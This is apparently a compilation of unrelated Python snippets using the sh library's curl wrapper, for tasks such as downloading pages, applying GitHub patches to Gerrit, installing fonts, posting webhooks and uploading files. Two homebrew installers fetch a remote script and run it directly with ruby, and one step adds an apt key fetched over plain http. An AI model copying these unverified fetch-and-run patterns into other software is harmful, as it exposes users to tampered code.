    Returns the file name of the text file produced.

    for example, 
    from 
    http://www.ebi.ac.uk/thornton-srv/databases/cgi-bin/pdbsum/GetPage.pl?pdbcode=6kiv&template=interfaces.html ,which is the 'Prot-prot' 
    page for 6kiv, it will get the source html and save it
    '''
    from sh import curl
    main_url = (
        "http://www.ebi.ac.uk/thornton-srv/databases/cgi-bin/pdbsum/GetPage.pl"
    )
    curl("-L", "-o", "{}".format(output_file_name), "--data",
         "pdbcode={}&template=interfaces.html".format(pdb_code),
         "{}".format(main_url))
    return output_file_name
Exemplo n.º 39
0
def add_reverbrain_repos():
    # there is no docker plugin package in trusty repos, hmm...
    # ok, let's try trusty. hope that docker plugin is integrated into libcocaine-core2
    repos = """\
    deb http://repo.reverbrain.com/trusty/ current/amd64/
    deb http://repo.reverbrain.com/trusty/ current/all/
    """
    with open("/etc/apt/sources.list.d/reverbrain.list", "a") as f:
        f.write(repos)
    sh.apt_key(sh.curl("http://repo.reverbrain.com/REVERBRAIN.GPG"), "add", "-")
    sh.apt_get("-y", "update")
def do_review(data):
    pr = get_pullreq(data['pull_request']['base']['repo']['name'], data['pull_request']['number'])
    logger_handler.setFormatter(logging.Formatter("%%(asctime)s %s PR#%s %%(message)s" % (pr.base.repo.name, pr.number)))
    name = gerrit_name_for(pr.base.repo.name)
    ensure_repo(name)
    gh_name = pr.base.repo.name
    path = path_for_name(name)
    sh.cd(path)
    sh.git.reset('--hard')
    sh.git.checkout('master')
    if 'tmp' in sh.git.branch():
        sh.git.branch('-D', 'tmp')
    sh.git.checkout(pr.base.sha, '-b', 'tmp')
    logger.info('Attempting to download & apply patch on top of SHA %s' % pr.base.sha)
    sh.git.am(sh.curl(pr.patch_url))
    logger.info('Patch applied successfully')

    # Author of last patch is going to be the author of the commit on Gerrit. Hmpf
    author = sh.git('--no-pager', 'log', '--no-color', '-n', '1', '--format="%an <%ae>"')

    sh.git.checkout('master')

    branch_name = 'github/pr/%s' % pr.number

    is_new = True
    change_id = None

    if branch_name in sh.git.branch():
        is_new = False
        sh.git.checkout(branch_name)
        change_id = get_last_change_id()
        sh.git.checkout("master")
        sh.git.branch('-D', branch_name)
        logger.info('Patchset with Id %s already exists', change_id)
    else:
        is_new = True
        logger.info('Patchset not found, creating new')

    logger.info('Attempting to Squash Changes on top of %s in %s', pr.base.sha, branch_name)
    sh.git.checkout(pr.base.sha, '-b', branch_name)
    sh.git.merge('--squash', 'tmp')
    sh.git.commit('--author', author, '-m', format_commit_msg(pr, change_id=change_id))
    logger.info('Changes squashed successfully')
    if is_new:
        change_id = get_last_change_id()
        logger.info('New Change-Id is %s', change_id)
    logger.info('Attempting to push refs for review')
    sh.git.push('gerrit', 'HEAD:refs/for/master') # FIXME: Push for non master too!
    logger.info('Pushed refs for review')
    sh.git.checkout('master') # Set branch back to master when we're done
    if is_new:
        gh.repos(OWNER, gh_name).issues(pr.number).comments.post(body='Submitted to Gerrit: %s' % gerrit_url_for(change_id))
        logger.info('Left comment on Pull Request')
Exemplo n.º 41
0
def curl(src, dest):
    """ Installs `src` to path `dest` """
    spinner = Halo(
        text="curl {}".format(dest),
        spinner="dots",
        placement="right"
    )
    spinner.start()
    if os.path.exists(dest):
        spinner.info("{} already exists".format(dest))
        return

    try:
        sh.curl("-fLo", dest, src)
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error(
            "Error downloading file `%s`: %s", src, err_message
        )
        spinner.fail()
Exemplo n.º 42
0
def send(host, room_id, token, message, message_format, trigger_status,
         trigger_severity, notify=True):

    print(curl(
        URL.format(host=host, room_id=room_id, token=token),
        d=json.dumps({
            'message': message,
            'message_format': message_format,
            'notify': notify,
            'color': color(trigger_status, trigger_severity)
        }),
        H='Content-type: application/json'
    ))
Exemplo n.º 43
0
def do_review(pr):
    name = gerrit_name_for(pr.base.repo.name)
    ensure_repo(name)
    gh_name = pr.base.repo.name
    path = path_for_name(name)
    sh.cd(path)
    sh.git.reset('--hard')
    sh.git.checkout('master')
    if 'tmp' in sh.git.branch():
        sh.git.branch('-D', 'tmp')
    sh.git.checkout(pr.base.sha, '-b', 'tmp')
    logging.info('Attempting to download & apply patch on top of SHA %s' % pr.base.sha)
    sh.git.am(sh.curl(pr.patch_url))
    logging.info('Patch applied successfully')

    # Author of last patch is going to be the author of the commit on Gerrit. Hmpf
    author = sh.git('--no-pager', 'log', '--no-color', '-n', '1', '--format="%an <%ae>"')

    sh.git.checkout('master')

    branch_name = 'github/pr/%s' % pr.number

    is_new = True
    change_id = None

    if branch_name in sh.git.branch():
        is_new = False
        sh.git.checkout(branch_name)
        change_id = get_last_change_id()
        sh.git.checkout("master")
        sh.git.branch('-D', branch_name)
        logging.info('Patchset with Id %s already exists', change_id)
    else:
        is_new = True
        logging.info('Patchset not found, creating new')

    logging.info('Attempting to Squash Changes on top of %s in %s', pr.base.sha, branch_name)
    sh.git.checkout(pr.base.sha, '-b', branch_name)
    sh.git.merge('--squash', 'tmp')
    sh.git.commit('--author', author, '-m', format_commit_msg(pr, change_id=change_id))
    logging.info('Changes squashed successfully')
    if is_new:
        change_id = get_last_change_id()
        logging.info('New Change-Id is %s', change_id)
    logging.info('Attempting git review')
    sh.git.review('-t', branch_name)
    logging.info('git review successful')
    sh.git.checkout('master') # Set branch back to master when we're done
    if is_new:
        gh.repos(OWNER, gh_name).issues(pr.number).comments.post(body='Submitted to Gerrit: %s' % gerrit_url_for(change_id))
        logging.info('Left comment on Pull Request')
    def download_client_config(self, cluster, service):
        """Download the client configuration zip for a particular cluster and service.

        Since cm_api does not provide a way to download the archive we build the URL
        manually and download the file. Once it downloaded the file the archive is
        extracted and its content is copied to the Hadoop configuration directories
        defined by Impala.
        """
        logger.info("Downloading client configuration for {0}".format(service.name))
        url = "http://{0}:7180/api/{1}/clusters/{2}/services/{3}/clientConfig".format(
            self.cm_host, CM_API_VERSION, urlquote(cluster.name), urlquote(service.name))
        path = mkdtemp()
        sh.curl(url, o=os.path.join(path, "clientConfig.zip"), _out=tee, _err=tee)
        current = os.getcwd()
        os.chdir(path)
        sh.unzip("clientConfig.zip")
        for root, _, file_names in os.walk("."):
            for filename in fnmatch.filter(file_names, "*.xml"):
                src = os.path.join(root, filename)
                dst = os.path.join(self.impala_home, "fe", "src", "test", "resources")
                logger.debug("Copying {0} to {1}".format(src, dst))
                shutil.copy(src, dst)
        os.chdir(current)
Exemplo n.º 45
0
def font(name):
    """ Installs fonts using curl.

    Args:
        name (str): The name of the font as defined in `font_library` dictionary.
    """
    spinner = Halo(
        text="Font {}".format(name),
        spinner="dots",
        placement="right"
    )
    spinner.start()
    try:
        library = os.path.join(HOME, "Library/Fonts")
        path = os.path.join(library, name)
        sh.curl("-fLo", path, font_library[name])
        spinner.succeed()
    except sh.ErrorReturnCode as err:
        err_message = "\n\t" + err.stderr.replace("\n", "\n\t")
        logging.error(
            "Error installing font `%s`: %s", name, err_message
        )
        spinner.fail()
Exemplo n.º 46
0
    def get_token(self):
        """returns the authentikation token from keystone with a curl call"""
        param = '{"auth":{"passwordCredentials":{"username": "******", "password":"******"}, "tenantName":"%(OS_TENANT_NAME)s"}}' % (self.credential)
        
        response = curl(
            "--cacert", self.credential['OS_CACERT'],
            "-k",
            "-X",
            "POST", "%s/tokens" % self.credential['OS_AUTH_URL'],
            "-d", param,
            "-H", 'Content-type: application/json'
            )

        result = json.loads(str(response))
        return result
Exemplo n.º 47
0
def upload():
    try:
        resp = curl(
            "https://api.imgur.com/3/image",
            H="Authorization: Client-ID ca77119dcc8c6d8",  # Get your client ID from imgur.com
            X="POST",
            F='image=@%s' % sys.argv[1])
        objresp = json.loads(resp.stdout)

        if objresp.get('success', False):
            return objresp['data']['link']
        else:
            return 'Error: ', objresp['data']['error']
    except Exception as e:
        print 'Error: ', e
Exemplo n.º 48
0
    def _get_code(self, nmpi_job, job_desc):
        """
        Obtain the code and place it in the working directory.

        If the experiment description is the URL of a Git repository, try to clone it.
        If it is the URL of a zip or .tar.gz archive, download and unpack it.
        Otherwise, the content of "code" is the code: write it to a file.
        """
        url_candidate = urlparse(nmpi_job['code'])
        logger.debug("Get code: %s %s", url_candidate.netloc, url_candidate.path)
        if url_candidate.scheme and url_candidate.path.endswith((".tar.gz", ".zip", ".tgz")):
            self._create_working_directory(job_desc.working_directory)
            target = os.path.join(job_desc.working_directory, os.path.basename(url_candidate.path))
            #urlretrieve(nmpi_job['code'], target) # not working via KIP https proxy
            curl(nmpi_job['code'], '-o', target)
            logger.info("Retrieved file from {} to local target {}".format(nmpi_job['code'], target))
            if url_candidate.path.endswith((".tar.gz", ".tgz")):
                tar("xzf", target, directory=job_desc.working_directory)
            elif url_candidate.path.endswith(".zip"):
                try:
                    # -o for auto-overwrite
                    unzip('-o', target, d=job_desc.working_directory)
                except:
                    logger.error("Could not unzip file {}".format(target))
        else:
            try:
                # Check the "code" field for a git url (clone it into the workdir) or a script (create a file into the workdir)
                # URL: use git clone
                git.clone('--recursive', nmpi_job['code'], job_desc.working_directory)
                logger.info("Cloned repository {}".format(nmpi_job['code']))
            except (sh.ErrorReturnCode_128, sh.ErrorReturnCode):
                # SCRIPT: create file (in the current directory)
                logger.info("The code field appears to be a script.")
                self._create_working_directory(job_desc.working_directory)
                with codecs.open(job_desc.arguments[0], 'w', encoding='utf8') as job_main_script:
                    job_main_script.write(nmpi_job['code'])
def update_entry_from_doi(entry):
    """Refill entry fields using its DOI."""
    if 'doi' not in entry:
        return entry
    ans = sh.curl('-LH', r'Accept: text/bibliography; style=bibtex',
                  r'http://dx.doi.org/' + entry['doi']).stdout
    ans = ans.decode('UTF-8')
    accepted_fields = ['title', 'volume', 'year', 'number', 'journal',
                       'publisher', 'month']
    new_fields = {}
    for field in accepted_fields:
        value = re.search(field + r'={([^}]*)}', ans)
        if value:
            new_fields[field] = value[1]
    entry.update(new_fields)
    return entry
def pull_info_from_doi(doi, accepted_fields=None):
    """Pull down paper info using its DOI identifier."""
    ans = sh.curl('-LH', r'Accept: text/bibliography; style=bibtex',
                  r'http://dx.doi.org/' + doi)
    ans = ans.stdout.decode('UTF-8')
    if accepted_fields is None:
        accepted_fields = [
            'title', 'year', 'volume', 'number', 'pages', 'ISBN', 'journal',
            'publisher', 'month', 'author', 'doi'
        ]
    details = {}
    for field in accepted_fields:
        value = re.search(field + r'={([^}]*)}', ans)
        if value:
            details[field] = value[1]
    details['doi'] = doi
    return details
Exemplo n.º 51
0
def install_homebrew():
    """ Installs or upgrades homebrew on mac.

    If homebrew is not installed, this command will install it, otherwise
    it will update homebrew to the latest version. Additionally, it will
    offer to upgrade all homebrew packages. Upgrading all packages can take
    a long time, so the user is given the choice to skip the upgrade.
    """
    print("Checking homebrew install")
    if sh.which("brew"):
        spinner = Halo(
            text="Updating homebrew", spinner="dots", placement="right"
        )
        spinner.start()
        sh.brew("update")
        spinner.succeed()
        print(
            "Before using homebrew to install packages, we can upgrade "
            "any outdated packages."
        )
        response = user_input("Run brew upgrade? [y|N] ")
        if response[0].lower() == "y":
            spinner = Halo(
                text="Upgrade brew packages", spinner="dots", placement="right"
            )
            spinner.start()
            sh.brew("upgrade")
            spinner.succeed()
        else:
            print("Skipped brew package upgrades")
    else:
        # TODO (phillip): Currently, this homebrew installation does not work on a fresh
        # computer. It works from the command line, but not when run from the script. I
        # need to figure out what is going on. It could be because user input is needed.
        spinner = Halo(
            text="Installing homebrew", spinner="dots", placement="right"
        )
        spinner.start()
        try:
            script = sh.curl("-fsSL", BREW_GITHUB).stdout
            sh.ruby("-e", script)
            spinner.succeed()
        except sh.ErrorReturnCode:
            logging.error("Unable to install homebrew. Aborting...")
            spinner.fail()
            exit(1)
Exemplo n.º 52
0
def install_homebrew():
    """ Installs or upgrades homebrew on mac.

    If homebrew is not installed, this command will install it, otherwise
    it will update homebrew to the latest version. Additionally, it will
    offer to upgrade all homebrew packages. Upgrading all packages can take
    a long time, so the user is given the choice to skip the upgrade.
    """
    print("Checking homebrew install")
    if sh.which("brew"):
        spinner = Halo(text="Updating homebrew",
                       spinner="dots",
                       placement="right")
        spinner.start()
        sh.brew("update")
        spinner.succeed()
        print("Before using homebrew to install packages, we can upgrade "
              "any outdated packages.")
        response = user_input("Run brew upgrade? [y|N] ")
        if response[0].lower() == "y":
            spinner = Halo(text="Upgrade brew packages",
                           spinner="dots",
                           placement="right")
            spinner.start()
            sh.brew("upgrade")
            spinner.succeed()
        else:
            print("Skipped brew package upgrades")
    else:
        # TODO (phillip): Currently, this homebrew installation does not work on a fresh
        # computer. It works from the command line, but not when run from the script. I
        # need to figure out what is going on. It could be because user input is needed.
        spinner = Halo(text="Installing homebrew",
                       spinner="dots",
                       placement="right")
        spinner.start()
        try:
            script = sh.curl("-fsSL", BREW_GITHUB).stdout
            sh.ruby("-e", script)
            spinner.succeed()
        except sh.ErrorReturnCode:
            logging.error("Unable to install homebrew. Aborting...")
            spinner.fail()
            exit(1)
Exemplo n.º 53
0
def package(ctx, path, version):
    '''
    Package a current path to a new version and upload to chart repo.
    '''
    # helm package --app-version 0.1.9 --version 0.1.9 fantuan-base
    # curl -F "[email protected]" http://localhost:8080/api/charts

    update_helm()

    path = path.strip('/')

    chart_name = path.split('/')[-1]
    if not version:
        click.echo(
            click.style('No version specified. Reading from chart_repo ...',
                        fg='yellow'))
        version = Version(
            get_chart_version(ctx.obj.get('helm_repo'), chart_name))
        version = str(version.next_patch())
        click.echo(click.style('Get new version %s' % version, fg='green'))
    Version(version)

    click.echo(click.style('Updateing dependency ...', fg='yellow'))
    helm.dependency.update(path)
    click.echo(click.style('Done!\n', fg='green'))

    click.echo(click.style('Packaging ...', fg='yellow'))
    helm.package('--app-version', version, '--version', version, path)
    tar = '%s-%s.tgz' % (path, version)

    click.echo(click.style('Uploading ...', fg='yellow'))
    cmd_result = curl('-F', 'chart=@%s' % tar,
                      get_chart_repo(ctx.obj.get('helm_repo')) + '/api/charts')

    click.echo(click.style('Cleaning ...', fg='yellow'))
    rm(tar)

    result = json.loads(cmd_result.stdout)
    if result.get('saved'):
        click.echo(click.style('SUCCESS!', fg='green'))
    else:
        click.echo(click.style('FAILED!: %s' % result.get('error'), fg='red'))
def run_docker_dev_test(path, coverage=False):
    """
    Method to check that docker runs with dev.yml
    """
    try:
        # build django, power up the stack and run the test
        sh.docker_compose("--file", "{}/dev.yml".format(path), "build",
                          "django")
        sh.docker_compose("--file", "{}/dev.yml".format(path), "build")
        if coverage:
            sh.docker_compose("--file", "{}/dev.yml".format(path), "run",
                              "django", "coverage", "run", "manage.py", "test")
            sh.docker_compose("--file", "{}/dev.yml".format(path), "run",
                              "django", "coverage", "xml", "-o",
                              "coverage.xml")
            shutil.copyfile(os.path.join(str(path), ".coverage"),
                            os.path.join(PROJECT_DIR, ".coverage"))
            shutil.copyfile(os.path.join(str(path), "coverage.xml"),
                            os.path.join(PROJECT_DIR, "coverage.xml"))
        else:
            sh.docker_compose("--file", "{}/dev.yml".format(path), "run",
                              "django", "python", "manage.py", "test")

        # test that the development server is running
        sh.docker_compose("--file", "{}/dev.yml".format(path), "up", "-d")
        time.sleep(10)
        curl = sh.curl("-I", "http://localhost:8000/")
        assert "200 OK" in curl
        assert "Server: Werkzeug" in curl

        # since we are running a lot of tests with different configurations,
        # we need to clean up the environment. Stop all running containers,
        # remove them and remove the postgres_data volume.
        sh.docker_compose("--file", "{}/dev.yml".format(path), "stop")
        sh.docker_compose("--file", "{}/dev.yml".format(path), "rm", "-f")
        sh.docker("volume", "rm",
                  "cookiecuttersaastestproject_postgres_data_dev")
    except sh.ErrorReturnCode as e:
        # in case there are errors it's good to have full output of
        # stdout and stderr.
        pytest.fail("STDOUT: {} \n\n\n STDERR: {}".format(
            e.stdout.decode("utf-8"), e.stderr.decode("utf-8")))
Exemplo n.º 55
0
def get_file_names(url=GNU_URL):
    html_file = str(sh.curl(url, silent=True))
    parsed_html = BeautifulSoup(html_file, 'html.parser')
    links = parsed_html.body.find_all('a', href=True, text='download')
    all_routes = []
    sig_routes = []
    tar_routes = []
    for a in links:
        strg = str(a)
        if strg.find('tar.bz2') > 1 or strg.find('tar.bz2.sig') > 1:
            for rec in REQD_PKG_NAMES:
                if strg.find(rec) > 1:
                    a['href']
                    all_routes.append(a['href'])
    for rt in all_routes:
        if rt.endswith('.bz2'):
            tar_routes.append(rt)
        elif rt.endswith('.sig'):
            sig_routes.append(rt)
    # print 'Sigs' + str(sig_routes) + '\r\n'
    # print 'Tar' + str(tar_routes) + '\r\n'
    REQD_FTP_ROUTES = sig_routes + tar_routes
    return all_routes, tar_routes, sig_routes
def download_data(output_folder, tiles=None, years=None, months=None,
                  live=True):
    for time_period in get_time_periods():
        (year, month) = parse_time_period(time_period)
        if not (months is None or month in months):
            continue  # not a month we care about
        if not (years is None or year in years):
            continue  # not a year we care about
        for tile_file in get_tile_files(time_period):
            tile = parse_tile_filename(tile_file)
            if not (tiles is None or tile in tiles):
                continue  # not a tile we care about
            url = '%s/%s/vcmcfg/%s' % (BASE_URL, time_period, tile_file)
            if live:
                # 'Warning: files to be downloaded are large'
                sh.tar(
                    sh.curl(url, _piped=True),
                    "xzv",
                    _cwd=output_folder
                )
            else:
                print 'Would download %s' % url
    if not live:
        print """
Exemplo n.º 57
0
        "attachments" : [
          {
            "color":"good",
            "fields":[
              {
                "title":"new value",
                "value":message,
                "short":False
                }
              ]
            }
          ]
        }
      payload = "payload=" + json.dumps(payload)
      sh.mv(new_file,old_file)
      sh.curl(["curl", "-X", "POST" ,"--data-urlencode" ,payload,script_metadata["slack_url"]])
  except Exception as e:
    print "failed on " + script +" :" + str(e) 

if len(sys.argv) > 1 and sys.argv[1] == "example":
    print("initialising example")
    if not isdir(script_dir):
      mkdir(script_dir)
    script = open(join(script_dir,"example.sh"),'w')
    script.write("#!/bin/bash\necho 'hi'")
    metafile = open(join(script_dir,"example.json"),'w')
    meta = {
      "channel":"#example",
      "user":"******",
      "title":"script title",
      "emoji":":metal:",
Exemplo n.º 58
0
def send(data, path):
    msg = json.dumps(data)
    log("Sending: \'{}\' to {}\n", msg, path)
    curl("-i", "-H", 'Content-Type: application/json', "-d", msg, "127.0.0.1:9001/%s" % path)